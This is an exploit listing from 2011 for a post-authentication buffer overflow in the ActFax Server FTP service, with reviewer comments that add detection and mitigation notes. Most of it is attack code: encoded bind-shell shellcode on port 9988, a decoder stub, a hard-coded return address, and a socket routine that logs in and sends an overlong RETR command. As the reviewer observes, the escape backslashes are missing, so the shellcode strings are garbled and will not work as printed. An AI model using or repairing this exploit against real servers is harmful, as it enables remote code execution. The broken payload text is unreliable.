ActFax Server FTP Remote Buffer Overflow
Posted on 09 June 2011
#!/usr/bin/python
#-----------------------------------------------------------------------------------
# Exploit Title: ActFax Server FTP Remote BOF (post auth)
# Author: b33f - Ruben Boonen
# Software Link: http://www.actfax.com/download/actfax_setup_en.exe
# Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation
#-----------------------------------------------------------------------------------
# Credit goes to chap0 for discovering the bug.
# A lot of thanks to PoURaN, for helping a n00b understand assembly better!!!
#-----------------------------------------------------------------------------------
# Reviewer summary (defensive reading of this listing):
#   The script logs in to the ActFax FTP service (USER/PASS) and then sends a
#   RETR command whose argument is an overlong buffer: NOP padding, an encoded
#   payload, a hard-coded return address and a small decoder stub -- roughly
#   1 KB in total going by the size comments below.  The overflow is only
#   reachable by an authenticated client ("post auth" in the title), so FTP
#   credential hygiene and limiting which hosts can reach the service reduce
#   exposure, and a RETR argument of this length and composition is a
#   straightforward FTP-log or IDS signal.
# NOTE(review): this is Python 2 syntax (print statements, str-based sockets).
# NOTE(review): the "\x.." escape backslashes appear to have been lost when the
#   page was extracted; as printed, the "x.." strings below are plain ASCII
#   text rather than the byte values the author's comments describe.
import socket
import sys  # imported but not used in the body below
print " ActFax XP SP3 Pro..."
print "Hunting for alphanumeric code!! "
#-----------------------------------------------------------------------------------
# payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum
#-----------------------------------------------------------------------------------
# Per the author's comment: a Metasploit-style bind-shell payload listening on
# TCP 9988, alphanumeric-encoded (PexAlphaNum).  Defender note: a successful run
# would show up as a new, unexpected listening port on the fax host, which
# host- or network-level monitoring can catch.
shellcode = (
    "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx46x4bx4e"
    "x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x36x4bx38"
    "x4ex56x46x32x46x52x4bx48x45x34x4ex43x4bx38x4ex47"
    "x45x50x4ax57x41x30x4fx4ex4bx38x4fx44x4ax41x4bx48"
    "x4fx55x42x32x41x30x4bx4ex49x44x4bx48x46x33x4bx38"
    "x41x30x50x4ex41x33x42x4cx49x49x4ex4ax46x58x42x4c"
    "x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
    "x46x4fx4bx53x46x55x46x42x4ax42x45x47x45x4ex4bx48"
    "x4fx35x46x52x41x30x4bx4ex48x36x4bx58x4ex30x4bx44"
    "x4bx58x4fx55x4ex51x41x30x4bx4ex43x30x4ex52x4bx38"
    "x49x58x4ex56x46x42x4ex51x41x56x43x4cx41x33x4bx4d"
    "x46x46x4bx48x43x34x42x43x4bx48x42x44x4ex50x4bx38"
    "x42x47x4ex51x4dx4ax4bx38x42x54x4ax50x50x35x4ax56"
    "x50x38x50x54x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"
    "x43x35x48x36x4ax56x43x33x44x33x4ax46x47x47x43x47"
    "x44x33x4fx55x46x45x4fx4fx42x4dx4ax56x4bx4cx4dx4e"
    "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx35x49x58x45x4e"
    "x48x56x41x48x4dx4ex4ax30x44x50x45x35x4cx46x44x50"
    "x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x55"
    "x4fx4fx48x4dx43x45x43x55x43x55x43x45x43x55x43x44"
    "x43x35x43x44x43x45x4fx4fx42x4dx48x36x4ax56x47x52"
    "x46x30x48x36x43x55x49x38x41x4ex45x59x4ax36x46x4a"
    "x4cx51x42x57x47x4cx47x45x4fx4fx48x4dx4cx56x42x31"
    "x41x45x45x45x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x32"
    "x49x4ex47x55x4fx4fx48x4dx43x55x45x45x4fx4fx42x4d"
    "x4ax56x45x4ex49x34x48x48x49x54x47x55x4fx4fx48x4d"
    "x42x35x46x55x46x55x45x45x4fx4fx42x4dx43x39x4ax46"
    "x47x4ex49x47x48x4cx49x57x47x45x4fx4fx48x4dx45x55"
    "x4fx4fx42x4dx48x36x4cx56x46x46x48x36x4ax46x43x46"
    "x4dx56x49x38x45x4ex4cx46x42x45x49x35x49x42x4ex4c"
    "x49x58x47x4ex4cx46x46x44x49x38x44x4ex41x53x42x4c"
    "x43x4fx4cx4ax50x4fx44x54x4dx32x50x4fx44x44x4ex32"
    "x43x59x4dx58x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"
    "x44x47x50x4fx43x4bx48x31x4fx4fx45x37x46x44x4fx4f"
    "x48x4dx4bx45x47x45x44x35x41x55x41x45x41x35x4cx56"
    "x41x30x41x45x41x55x45x55x41x45x4fx4fx42x4dx4ax36"
    "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx56"
    "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx38x47x35x4ex4f"
    "x43x38x46x4cx46x46x4fx4fx48x4dx44x55x4fx4fx42x4d"
    "x4ax36x42x4fx4cx58x46x50x4fx55x43x35x4fx4fx48x4d"
    "x4fx4fx42x4dx5a")
#-----------------------------------------------------------------------------------
# ASCII encoded => Size=52
# Decoded opcode => E9DE140000 - JMP 0178D7A7
#-----------------------------------------------------------------------------------
# Author's decoder stub: a chain of AND/SUB/PUSH instructions (each line is
# commented with the instruction it encodes) that assembles a far JMP on the
# stack and then jumps back to it.  The addresses in the comments are from the
# author's XP SP3 test VM and are not meaningful elsewhere.
farjump = (
    "x25x4Ax4Dx4Ex55"  # AND EAX,554E4D4A
    "x25x35x32x31x2A"  # AND EAX,2A313235
    "x2Dx55x55x55x5A"  # SUB EAX,5A555555
    "x2Dx55x55x55x5A"  # SUB EAX,5A555555
    "x2Dx56x55x55x5B"  # SUB EAX,5B555556
    "x50"              # PUSH EAX
    "x25x4Ax4Dx4Ex55"  # AND EAX,554E4D4A
    "x25x35x32x31x2A"  # AND EAX,2A313235
    "x2Dx5Dx60x4Ex55"  # SUB EAX,554E605D
    "x2Dx5Dx60x4Ex55"  # SUB EAX,554E605D
    "x2Dx5Dx60x4Ex55"  # SUB EAX,554E605D
    "x50"              # PUSH EAX
    "xEBxC1")          # JMP SHORT 0112CAE0 (back to the beginning of ESP,
                       # ESP now points to our decoded far-jump).
#-----------------------------------------------------------------------------------
#
# At crash time our buffer is copied several times into memory (some of these are
# corrupt), so we write some fancy far-jump instruction in ESP. After this is
# decoded in memory we jump to our nop bytes (i think 3rd iteration of our buffer).
# Ironically this doesn't even crash the program, only when you close the bind
# shell connection does the program crash...
#
# jmp esp - user32.dll => 0x7E429353
#-----------------------------------------------------------------------------------
# Buffer layout, left to right: 41 NOP bytes, the encoded payload, 23 NOP bytes,
# the return address ("x53x93x42x7E" is 0x7E429353 written little-endian -- the
# user32.dll JMP ESP named in the comment above), 1 NOP, the decoder stub, then
# 175 NOP bytes of padding.  (The name shadows the Python 2 builtin `buffer`;
# harmless here since the builtin is never used.)
# Mitigation note: the return address is a fixed location in a system DLL on the
# author's XP SP3 build.  On a host with ASLR the address is not stable, and
# executing code out of a stack buffer is what DEP is designed to block, which
# is why this exploit is tied to that specific platform.
buffer = "x90"*41 + shellcode + "x90"*23 + "x53x93x42x7E" + "x90"*1 + farjump + "x90"*175
# Plain TCP client session against the FTP control port.  The target is a
# hard-coded private lab address as given on the page.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.71',21))  # socket.connect() returns None, so `connect` is always None
s.recv(1024)  # read (and discard) the initial server response
s.send('USER ' + 'b33f ')
print (s.recv(1024))
s.send('PASS b33f ')
print (s.recv(1024))
# The overflow trigger: a RETR whose argument is the ~1 KB buffer built above.
s.send('RETR ' + buffer + ' ')
s.close  # NOTE(review): attribute reference only -- close() is never actually called
